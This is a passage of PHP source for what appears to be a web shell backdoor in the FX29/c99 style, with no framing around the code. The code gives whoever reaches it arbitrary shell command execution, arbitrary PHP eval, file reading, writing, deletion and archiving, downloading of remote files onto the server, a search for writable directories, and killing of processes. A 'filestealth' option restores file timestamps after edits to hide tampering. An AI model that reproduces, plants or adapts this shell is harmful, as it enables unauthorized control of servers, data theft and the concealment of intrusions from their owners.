$uploadmess;$act="ls";}if($act=="delete"){$delerr="";foreach($actbox as $v){$result=FALSE;$result=fs_rmobj($v);if(!$result){$delerr.="Can't delete ".htmlspecialchars($v)."<br>";}}if(!empty($delerr)){disp_error("Error deleting:<br>$delerr");}$act="ls";}if($act=="copy"){$err="";$sess_data["copy"]=array_merge($sess_data["copy"],$actbox);fx29_sess_put($sess_data);$act="ls";}elseif($act=="cut"){$sess_data["cut"]=array_merge($sess_data["cut"],$actbox);fx29_sess_put($sess_data);$act="ls";}elseif($act=="unselect"){foreach($sess_data["copy"] as $k=>$v){if(in_array($v,$actbox)){unset($sess_data["copy"][$k]);}}foreach($sess_data["cut"] as $k=>$v){if(in_array($v,$actbox)){unset($sess_data["cut"][$k]);}}fx29_sess_put($sess_data);$act="ls";}if(@$actemptybuff){$sess_data["copy"]=$sess_data["cut"]=array();fx29_sess_put($sess_data);}elseif(@$actpastebuff){$psterr="";foreach($sess_data["copy"] as $k=>$v){$to=$d.basename($v);if(!fs_copy_obj($v,$to)){$psterr.="Can't copy ".$v." to ".$to."!<br>";}if($copy_unset){unset($sess_data["copy"][$k]);}}foreach($sess_data["cut"] as $k=>$v){$to=$d.basename($v);if(!fs_move_obj($v,$to)){$psterr.="Can't move ".$v." to ".$to."!<br>";}unset($sess_data["cut"][$k]);}fx29_sess_put($sess_data);if(!empty($psterr)){disp_error("Pasting with errors:<br>$psterr");}$act="ls";}elseif(@$actarcbuff){$arcerr="";if(substr($actarcbuff_path,-7 ,7 )==".tar.gz"){$ext=".tar.gz";}else {$ext=".tar.gz";}if($ext==".tar.gz"){$cmdline="tar cfzv";}$cmdline.=" ".$actarcbuff_path;$objects=array_merge($sess_data["copy"],$sess_data["cut"]);foreach($objects as $v){$v=str_replace("\\",DIRECTORY_SEPARATOR,$v);if(substr($v,0 ,strlen($d))==$d){$v=basename($v);}if(is_dir($v)){if(substr($v,-1 )!=DIRECTORY_SEPARATOR){$v.=DIRECTORY_SEPARATOR;}$v.="*";}$cmdline.=" ".$v;}$tmp=realpath(".");chdir($d);$ret=fx29exec($cmdline);chdir($tmp);if(empty($ret)){$arcerr.="Can't call archivator (".htmlspecialchars(str2mini($cmdline,60 )).")!<br>";}$ret=str_replace("\r\n","\n",$ret);$ret=explode("\n",$ret);if($copy_unset){foreach($sess_data["copy"] as $k=>$v){unset($sess_data["copy"][$k]);}}foreach($sess_data["cut"] as $k=>$v){if(in_array($v,$ret)){fs_rmobj($v);}unset($sess_data["cut"][$k]);}fx29_sess_put($sess_data);if(!empty($arcerr)){disp_error("Archivation errors:<br>$arcerr");}$act="ls";}if($act=="cmd"){@chdir($chdir);if(!empty($submit)){bar_header(".: Command Output :.");$olddir=realpath(".");@chdir($d);$ret=fx29exec($cmd);$ret=convert_cyr_string($ret,"d","w");if($cmd_txt){$rows=count(explode("\n",$ret))+1 ;if($rows<10 ){$rows=10 ;}else {$rows=30 ;}$cols=125 ;echo "<textarea class=\"shell\" cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";}else {echo $ret."<br>";}@chdir($olddir);}}if($act=="phpfsys"){echo "<div align=left>";$fsfunc=$phpfsysfunc;if($fsfunc=="copy"){if(!copy($arg1,$arg2)){echo "Failed to copy $arg1...\n";}else {echo "<b>Success!</b> $arg1 copied to $arg2\n";}}elseif($fsfunc=="rename"){if(!rename($arg1,$arg2)){echo "Failed to rename/move $arg1!\n";}else {echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n";}}elseif($fsfunc=="chmod"){if(!chmod($arg1,$arg2)){echo "Failed to chmod $arg1!\n";}else {echo "<b>Perm for $arg1 changed to $arg2!</b>\n";}}elseif($fsfunc=="read"){$darg=$d.$arg1;if($hasil=@file_get_contents($darg)){echo "<b>Filename:</b> ".$darg."<br>";echo "<center><textarea cols=125 rows=30>";echo htmlentities($hasil);echo "</textarea></center>\n";}else {disp_error("Couldn't open $darg");}}elseif($fsfunc=="write"){$darg=$d.$arg1;if(@file_put_contents($darg,$arg2)){echo "<b>Saved!</b> ".$darg;}else {disp_error("Can't write to $darg!");}}elseif($fsfunc=="downloadbin"){$handle=fopen($arg1,"rb");$contents='';while(!feof($handle)){$contents.=fread($handle,8192 );}$r=@fopen($d.$arg2,'w');if(fwrite($r,$contents)){echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")";}else {disp_error("Can't write to ".$d.$arg2."!");}fclose($r);fclose($handle);}elseif($fsfunc=="download"){$text=implode('',file($arg1));if($text){$r=@fopen($d.$arg2,'w');if(fwrite($r,$text)){echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")";}else {disp_error("Can't write to ".$d.$arg2."!");}fclose($r);}else {disp_error("Can't download from $arg1!");}}elseif($fsfunc=='mkdir'){$thedir=$d.$arg1;if($thedir!=$d){if(file_exists($thedir)){echo "<b>Already exists:</b> ".htmlspecialchars($thedir);}elseif(!mkdir($thedir)){echo "<b>Access denied:</b> ".htmlspecialchars($thedir);}else {echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}}else {echo "Can't create current dir:<b> $thedir</b>";}}elseif($fsfunc=='fwritabledir'){function recurse_dir($dir,$max_dir){global $dir_count;$dir_count++;if($cdir=dir($dir)){while($entry=$cdir->read()){if($entry!='.' && $entry!='..'){if(is_dir($dir.$entry) && is_writable($dir.$entry)){if($dir_count>$max_dir){return ;}echo "[".$dir_count."] ".$dir.$entry."\n";recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);}}}$cdir->close();}}if(!$arg1){$arg1=$d;}if(!$arg2){$arg2=10 ;}if(is_dir($arg1)){echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";echo "<pre>";recurse_dir($arg1,$arg2);echo "</pre>";$total=$dir_count-1 ;echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";}else {disp_error("Directory is not exists or permission denied!");}}else {if(!$arg1){disp_error("No operation! Please fill 1st parameter!");}else {if($hasil=$fsfunc($arg1)){echo "<b>Result of $fsfunc $arg1:</b><br>";if(!is_array($hasil)){echo "$hasil\n";}else {echo "<pre>";foreach($hasil as $v){echo $v."\n";}echo "</pre>";}}else {disp_error("$fsfunc $arg1 failed!");}}}echo "</div>\n";}if($act=="ls"){if(count($ls_arr)>0 ){$list=$ls_arr;}else {$list=array();if($h=@opendir($d)){while(($o=readdir($h))!==FALSE){$list[]=$d.$o;}closedir($h);}}if(count($list)==0 ){disp_error("No such directory or access denied!<br>".htmlspecialchars($d));}else {$objects=array();$vd="f";if($vd=="f"){$objects["head"]=array();$objects["folders"]=array();$objects["links"]=array();$objects["files"]=array();foreach($list as $v){$o=basename($v);$row=array();if($o=="."){$row[]=$d.$o;$row[]="CURDIR";}elseif($o==".."){$row[]=$d.$o;$row[]="DIR";}elseif(is_dir($v)){if(is_link($v)){$type="LINK";}else {$type="DIR";}$row[]=$v;$row[]=$type;}elseif(is_file($v)){$row[]=$v;$row[]=filesize($v);}$row[]=filemtime($v);if(!is_windows()){$ow=posix_getpwuid(fileowner($v));$gr=posix_getgrgid(filegroup($v));$row[]=($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));}$row[]=fileperms($v);if(($o==".") or ($o=="..")){$objects["head"][]=$row;}elseif(is_link($v)){$objects["links"][]=$row;}elseif(is_dir($v)){$objects["folders"][]=$row;}elseif(is_file($v)){$objects["files"][]=$row;}$i++;}$row=array();$row[]="<b>Name</b>";$row[]="<b>Size</b>";$row[]="<b>Date Modified</b>";if(!is_windows()){$row[]="<b>Owner/Group</b>";}$row[]="<b>Perms</b>";$row[]="<b>Action</b>";$parsesort=parsesort($sort);$sort=$parsesort[0 ].$parsesort[1 ];$k=$parsesort[0 ];if($parsesort[1 ]!="a"){$parsesort[1 ]="d";}$y=" <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1 ]=="a"?"d":"a")."\">";$y.="<img src=\"".$surl."act=img&img=sort_".($sort[1 ]=="a"?"asc":"desc")."\" alt=\"".($parsesort[1 ]=="a"?"Asc":"Desc")."\"></a>";$row[$k].=$y;for($i=0 ;$i<count($row)-1 ;$i++){if($i!=$k){$row[$i]="<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1 ]."\">".$row[$i]."</a>";}}$v=$parsesort[0 ];usort($objects["folders"],"tabsort");usort($objects["links"],"tabsort");usort($objects["files"],"tabsort");if($parsesort[1 ]=="d"){$objects["folders"]=array_reverse($objects["folders"]);$objects["files"]=array_reverse($objects["files"]);}$objects=array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);$tab=array();$tab["cols"]=array($row);$tab["head"]=array();$tab["folders"]=array();$tab["links"]=array();$tab["files"]=array();$i=0 ;foreach($objects as $a){$v=$a[0 ];$o=basename($v);$dir=dirname($v);if($disp_fullpath){$disppath=$v;}else {$disppath=$o;}$disppath=str2mini($disppath,60 );if(in_array($v,$sess_data["cut"])){$disppath="<strike>".$disppath."</strike>";}elseif(in_array($v,$sess_data["copy"])){$disppath="<u>".$disppath."</u>";}foreach($regxp_highlight as $r){if(ereg($r[0 ],strtolower($o))){if((!is_numeric($r[1 ])) or ($r[1 ]>3 )){$r[1 ]=0 ;@ob_clean();disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command.");fx29shexit();}else {$r[1 ]=round($r[1 ]);$isdir=is_dir($v);if(($r[1 ]==0 ) or (($r[1 ]==1 ) and !$isdir) or (($r[1 ]==2 ) and !$isdir)){if(empty($r[2 ])){$r[2 ]="<b>";$r[3 ]="</b>";}$disppath=$r[2 ].$disppath.$r[3 ];if(isset($r[4 ])){break;}}}}}$uo=urlencode($o);$ud=urlencode($dir);$uv=urlencode($v);$row=array();if($o=="."){$row[]="<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> ".$o."</a>";$row[]="CURDIR";}elseif($o==".."){$row[]="<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> ".$o."</a>";$row[]="UPDIR";}elseif(is_dir($v)){if(is_link($v)){$disppath.=" => ".readlink($v);$type="LNK";$row[]="<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> [".$disppath."]</a>";}else {$type="DIR";$row[]="<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> [".$disppath."]</a>";}$row[]=$type;}elseif(is_file($v)){$ext=explode(".",$o);$c=count($ext)-1 ;$ext=$ext[$c];$ext=strtolower($ext);$row[]="<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" alt=\"\"> ".$disppath."</a>";$row[]=view_size($a[1 ]);}$row[]=@date("d.m.Y H:i:s",$a[2 ]);if(!is_windows()){$row[]=$a[3 ];}$row[]="<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";if($o=="."){$checkbox="<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">";$i--;}else {$checkbox="<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}if(is_dir($v)){$row[]="$checkbox <a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ";}else {$row[]="$checkbox "."<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> "."<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\"></a> "."<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\"></a>";}if(($o==".") or ($o=="..")){$tab["head"][]=$row;}elseif(is_link($v)){$tab["links"][]=$row;}elseif(is_dir($v)){$tab["folders"][]=$row;}elseif(is_file($v)){$tab["files"][]=$row;}$i++;}}echo "<div class=barheader>.: ";if(!empty($fx_infohead)){echo $fx_infohead;}else {echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)";}echo " :.</div>\n\n";echo "<form name=\"ls_form\" action=\"$surl\" method=\"post\">\n"."<input type=hidden name=act value=\"$dspact\">\n"."<input type=hidden name=d value=\"$d\">\n"; ?>
<table class="explorer">
<? $table=array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);foreach($table as $row){echo "\t<tr>";foreach($row as $v){echo "<td>".$v."</td>";}echo "</tr>\n";} ?>
</table>

<div align="right">

	<script language="javascript">
	function ls_setcheckboxall(status) {
	  var id = 1; var num = <? echo (count($table)-2 ); ?>;
	  while (id <= num) {
	    document.getElementById('actbox'+id).checked = status; id++;
	  }
	}
	function ls_reverse_all() {
	  var id = 1; var num = <? echo (count($table)-2 ); ?>;
	  while (id <= num) {
	    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++;
	  }
	}
	</script>

	<input type="button" onclick="ls_setcheckboxall(true);" value="Check all">
	<input type="button" onclick="ls_setcheckboxall(false);" value="Uncheck all">
<? if(count(array_merge($sess_data["copy"],$sess_data["cut"]))>0 ){echo "\t<input type=\"submit\" name=\"actarcbuff\" value=\"Archive it!\">"."\t<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1 ,1000 ).rand(1 ,1000 )),0 ,5 ).".tar.gz\">\n"."\t<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">\n"."\t<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">";}echo "\n\t"."<select name=act>\n"."\t\t<option value=\"".$act."\">With checked:</option>\n";$f_acts=array("delete","chmod","cut","copy","unselect");foreach($f_acts as $f1){echo "\t\t<option value=\"$f1\"".($dspact=="$f1"?" selected":"").">$f1</option>\n";} ?>
	</select>

	<input type="submit" value="Confirm">

</div>
</form>
<? }}if($act=="f"){echo "<div align=left>";if(!isset($ft)){$ft="";}if(!isset($newwin)){$newwin="";}if((!is_readable($d.$f) or is_dir($d.$f)) and $ft!="edit"){if(file_exists($d.$f)){disp_error("Access denied!<br>".htmlspecialchars($d.$f));}else {disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."<br>\n"."<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>");}}else {$r=@file_get_contents($d.$f);$ext=explode(".",$f);$c=count($ext)-1 ;$ext=$ext[$c];$ext=strtolower($ext);$rft="";foreach($ftypes as $k=>$v){if(in_array($ext,$v)){$rft=$k;break;}}if(eregi("sess_(.*)",$f)){$rft="phpsess";}if(empty($ft)){$ft=$rft;}$arr=array(array("<img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\">","info"),array("<img src=\"".$surl."act=img&img=ext_html\" alt=\"html\">","html"),array("<img src=\"".$surl."act=img&img=ext_txt\" alt=\"txt\">","txt"),array("<img src=\"".$surl."act=img&img=ext_ini\" alt=\"ini\">","ini"),array("Code","code"),array("Session","phpsess"),array("SDB","sdb"),array("<img src=\"".$surl."act=img&img=ext_exe\" alt=\"exe\">","exe"),array("<img src=\"".$surl."act=img&img=ext_gif\" alt=\"img\">","img"),array("<img src=\"".$surl."act=img&img=ext_rtf\" alt=\"Notepad\">","notepad"),array("<img src=\"".$surl."act=img&img=change\" alt=\"Edit\">","edit"),array("<img src=\"".$surl."act=img&img=download\" alt=\"Download\">","download"));echo "<div class=barheader>.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."] :.\n";echo "<hr size=1 noshade>\n";foreach($arr as $t){if($t[1 ]==$rft){echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1 ]."&d=".urlencode($d)."\"><font color=#3366FF>".$t[0 ]."</font></a>";}elseif($t[1 ]==$ft){echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1 ]."&d=".urlencode($d)."\"><b><u>".$t[0 ]."</u></b></a>";}else {echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1 ]."&d=".urlencode($d)."\"><b>".$t[0 ]."</b></a>";}echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1 ]."&d=".urlencode($d)."&newwin=1\" title=\"New Window\" target=\"_blank\">+</a>) ";}echo "</div>\n";if($ft=="info"){echo "<br>";bar_header("Information");echo "<table class=contents>\n"."<tr><th>Path</th><td>".$d.$f."</td></tr>\n"."<tr><th>Size</th><td>".view_size(filesize($d.$f))."</td></tr>\n"."<tr><th>MD5</th><td>".md5_file($d.$f)."</td></tr>\n";if(!is_windows()){echo "<tr><th><b>Owner/Group</b></td><td>";$ow=posix_getpwuid(fileowner($d.$f));$gr=posix_getgrgid(filegroup($d.$f));echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));}echo "<tr><th>Perms</th><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr>\n"."<tr><th>Create time</th><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>\n"."<tr><th>Access time</th><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>\n"."<tr><th>Modify time</th><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>\n";echo "<tr><th>HexDump</th><td>\n"."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a> ] "."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a> ]<br>\n"."</td></tr>\n"."<tr><th>Base64</th><td>\n"."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a> ] "."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a> ] "."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a> ] "."[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a> ] "."</td></tr>\n"."</table><br>\n";$fi=fopen($d.$f,"rb");if($fi){echo "<div class=barheader>";if(@$fullhexdump){echo "Full HexDump";$str=fread($fi,filesize($d.$f));}else {echo "HexDump Preview";$str=fread($fi,$hexdump_lines*$hexdump_rows);}$n=0 ;$a0="00000000<br>";$a1="";$a2="";for($i=0 ;$i<strlen($str);$i++){$a1.=sprintf("%02X",ord($str[$i]))." ";switch(ord($str[$i])){case 0 :$a2.="<font>0</font>";break;case 32 :case 10 :case 13 :$a2.=" ";break;default:$a2.=htmlspecialchars($str[$i]);}$n++;if($n==$hexdump_rows){$n=0 ;if($i+1 <strlen($str)){$a0.=sprintf("%08X",$i+1 )."<br>";}$a1.="<br>";$a2.="<br>";}}echo "</div>\n";echo "<table class=code><tr><td>".$a0."</td><td>".$a1."</td><td>".$a2."</td></tr></table><br>\n";}$henc="";$encoded="";if(!isset($base64)){$base64="";}if($base64==1 ){$henc="Base64 Encode";$encoded=base64_encode(file_get_contents($d.$f));}elseif($base64==2 ){$henc="Base64 Encode + Chunk";$encoded=chunk_split(base64_encode(file_get_contents($d.$f)));}elseif($base64==3 ){$henc="Base64 Encode + Chunk + Quotes";$encoded=base64_encode(file_get_contents($d.$f));$encoded=substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0 ,-2 );}elseif($base64==4 ){$text=file_get_contents($d.$f);$encoded=base64_decode($text);$henc="<b>Base64 Decode";if(base64_encode($encoded)!=$text){$henc.=" (Failed!)";}}if(!empty($encoded)){bar_header($henc);echo "<textarea cols=100 rows=10>".htmlspecialchars($encoded)."</textarea>";echo "<br>\n";}}elseif($ft=="html"){if($newwin){@ob_clean();echo $r;fx29shexit();}else {echo $r;}}elseif($ft=="txt"){echo "<center><textarea cols=\"125\" rows=\"20\">".htmlspecialchars($r)."</textarea></center>";}elseif($ft=="ini"){echo "<pre>";var_dump(parse_ini_file($d.$f,TRUE));echo "</pre>";}elseif($ft=="phpsess"){echo "<pre>";$v=explode("|",$r);echo $v[0 ]."<br>";var_dump(unserialize($v[1 ]));echo "</pre>";}elseif($ft=="exe"){$ext=explode(".",$f);$c=count($ext)-1 ;$ext=$ext[$c];$ext=strtolower($ext);$rft="";foreach($exeftypes as $k=>$v){if(in_array($ext,$v)){$rft=$k;break;}}$cmd=str_replace("%f%",$f,$rft);echo "<b>Execute file:</b>\n"."<form name=\"f_xfile\" action=\"".$surl."\" method=\"post\">\n"."<input type=hidden name=act value=cmd>\n"."<input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br>\n"."<input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2 )."\"> \n"."<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked> - Display in text-area\n"."<input type=submit name=submit value=\"Execute\"></form>\n";}elseif($ft=="sdb"){echo "<pre>";var_dump(unserialize(base64_decode($r)));echo "</pre>\n";}elseif($ft=="code"){echo "<div class=code style=\"background-color: ".$highlight_bg."\">\n";if(@$newwin){@ob_clean();highlight_file($d.$f);fx29shexit();}else {highlight_file($d.$f);}echo "\n</div>\n";}elseif($ft=="notepad"){@ob_clean();header("Content-type: text/plain");header("Content-disposition: attachment; filename=\"".$f.".txt\";");echo ($r);exit;}elseif($ft=="download"){@ob_clean();header("Content-type: application/octet-stream");header("Content-length: ".filesize($d.$f));header("Content-disposition: attachment; filename=\"".$f."\";");echo $r;exit;}elseif($ft=="img"){$inf=getimagesize($d.$f);if(!$newwin){if(empty($imgsize)){$imgsize=20 ;}$width=$inf[0 ]/100 *$imgsize;$height=$inf[1 ]/100 *$imgsize;echo "<center><b>Size:</b> ";$sizes=array("100","50","20");foreach($sizes as $v){echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";if($imgsize!=$v){echo $v;}else {echo "<u>".$v."</u>";}echo "</a> &nbsp; ";}echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&newwin=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\"></center>";}else {@ob_clean();$ext=explode($f,".");$ext=$ext[count($ext)-1 ];header("Content-type: ".$inf["mime"]);readfile($d.$f);exit;}}elseif($ft=="edit"){if(!empty($submit)){if($filestealth){$stat=stat($d.$f);}$fp=fopen($d.$f,"w");if(!$fp){echo "<b>Can't write to file!</b>";}else {echo "<b>Saved!</b>";fwrite($fp,$edit_text);fclose($fp);if($filestealth){touch($d.$f,$stat[9 ],$stat[8 ]);}$r=$edit_text;}}$rows=count(explode("\r\n",$r));if($rows<10 ){$rows=10 ;}elseif($rows>30 ){$rows=30 ;}echo "<form name=\"f_save\" action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=\"post\">\n"."<input type=submit name=submit value=\"Save\"> "."<input type=\"reset\" value=\"Reset\"> "."<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0 ,-1 ))."';\" value=\"Back\"><br>"."<textarea name=\"edit_text\" cols=\"125\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>\n"."</form>\n";}elseif(!empty($ft)){echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}}echo "</div>\n";}if($act=="d"){if(!is_dir($d)){echo "<center><b>$d is a not a Directory!</b></center>";}else {echo "<b>Directory information:</b>\n";echo "<table>\n";if(!is_windows()){echo "<tr><td><b>Owner/Group</b></td><td> ";$ow=posix_getpwuid(fileowner($d));$gr=posix_getgrgid(filegroup($d));$row[]=($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));}echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";}}if($act=="processes"){bar_header(".: Processes :.");if(!is_windows()){$handler="ps aux".($grep?" | grep '".addslashes($grep)."'":"");}else {$handler="tasklist";}$ret=fx29exec($handler);if(!$ret){disp_error("Can't execute \"$handler\"!");}else {if(empty($processes_sort)){$processes_sort=$sort_default;}$parsesort=parsesort($processes_sort);if(!is_numeric($parsesort[0 ])){$parsesort[0 ]=0 ;}$k=$parsesort[0 ];if($parsesort[1 ]!="a"){$y=" <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";}else {$y=" <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";}$ret=htmlspecialchars($ret);if(!is_windows()){if($pid){if(is_null($sig)){$sig=9 ;}echo "Sending signal ".$sig." to #".$pid."... ";if(posix_kill($pid,$sig)){echo "<b>OK!</b>";}else {echo "<b>ERROR!</b>";}}while(ereg("  ",$ret)){$ret=str_replace("  "," ",$ret);}$stack=explode("\n",$ret);$head=explode(" ",$stack[0 ]);unset($stack[0 ]);for($i=0 ;$i<count($head);$i++){if($i!=$k){$head[$i]="<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1 ]."\"><b>".$head[$i]."</b></a>";}}$head[$i]="";$prcs=array();foreach($stack as $line){if(!empty($line)){$line=explode(" ",$line);$line[10 ]=join(" ",array_slice($line,10 ));$line=array_slice($line,0 ,11 );if($line[0 ]==get_current_user()){$line[0 ]='<font class="on">'.$line[0 ]."</font>";}$line[]="<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1 ]."&sig=9\"><u>KILL</u></a>";$prcs[]=$line;}}}else {if(@$pid){echo "Killing PID ".$pid."... ";echo fx29exec("taskkill /PID $pid /F");}while(ereg("  ",$ret)){$ret=str_replace("  "," ",$ret);}while(ereg("=",$ret)){$ret=str_replace("=","",$ret);}$ret=convert_cyr_string($ret,"d","w");$stack=explode("\n",$ret);unset($stack[0 ],$stack[2 ]);$stack=array_values($stack);$stack[0 ]=str_replace("Image Name","Image-Name",$stack[0 ]);$stack[0 ]=str_replace("Session Name","Session-Name",$stack[0 ]);$stack[0 ]=str_replace("Mem Usage","Memory-Usage",$stack[0 ]);$stack[0 ].=" KILL";$head=explode(" ",$stack[0 ]);$stack=array_slice($stack,1 );$head=array_values($head);if($parsesort[1 ]!="a"){$y=" <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";}else {$y=" <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";}if($k>count($head)){$k=count($head)-1 ;}for($i=0 ;$i<count($head);$i++){if($i!=$k){$head[$i]="<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1 ]."\"><b>".trim($head[$i])."</b></a>";}}$prcs=array();unset($stack[0 ]);foreach($stack as $line){if(!empty($line)){$line=explode(" ",$line);$line[4 ]=str_replace(".","",$line[4 ]);$line[4 ]=intval($line[4 ])*1024 ;unset($line[5 ]);$line[]="<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1 ]."\"><u>KILL</u></a>";$prcs[]=$line;}}}$head[$k]="<b>".$head[$k]."</b>".$y;$v=$processes_sort[0 ];usort($prcs,"tabsort");if($processes_sort[1 ]=="d"){$prcs=array_reverse($prcs);}$tab=array();$tab[]=$head;$tab=array_merge($tab,$prcs);echo "<table class=\"explorer\">\n";foreach($tab as $i=>$k){echo "\t<tr>";foreach($k as $j=>$v){if(is_windows() and $i>0  and $j==4 ){$v=view_size($v);}echo "<td>".$v."</td>";}echo "</tr>\n";}echo "</table>\n";}}if($act=="eval"){if(!empty($eval)){bar_header("Result of execution this PHP-code:");$tmp=@ob_get_contents();$olddir=realpath(".");@chdir($d);if($tmp){@ob_clean();eval($eval);$ret=@ob_get_contents();$ret=convert_cyr_string($ret,"d","w");@ob_clean();echo $tmp;if(@$eval_txt){$rows=count(explode("\r\n",$ret))+1 ;if($rows<10 ){$rows=10 ;}echo "<br><textarea cols=\"125\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";}else {echo $ret."<br>";}}else {if($eval_txt){echo "<br><textarea cols=\"125\" rows=\"10\" readonly>";eval($eval);echo "</textarea>";}else {echo $ret;}}@chdir($olddir);}else {bar_header(".: PHP-code Execution :.");if(empty($eval_txt)){$eval_txt=TRUE;}} ?>
<form name="f_eval" action="<? echo $surl; ?>" method="post">
	<input type="hidden" name="act" value="eval">
	<textarea name="eval" cols="125" rows="10">
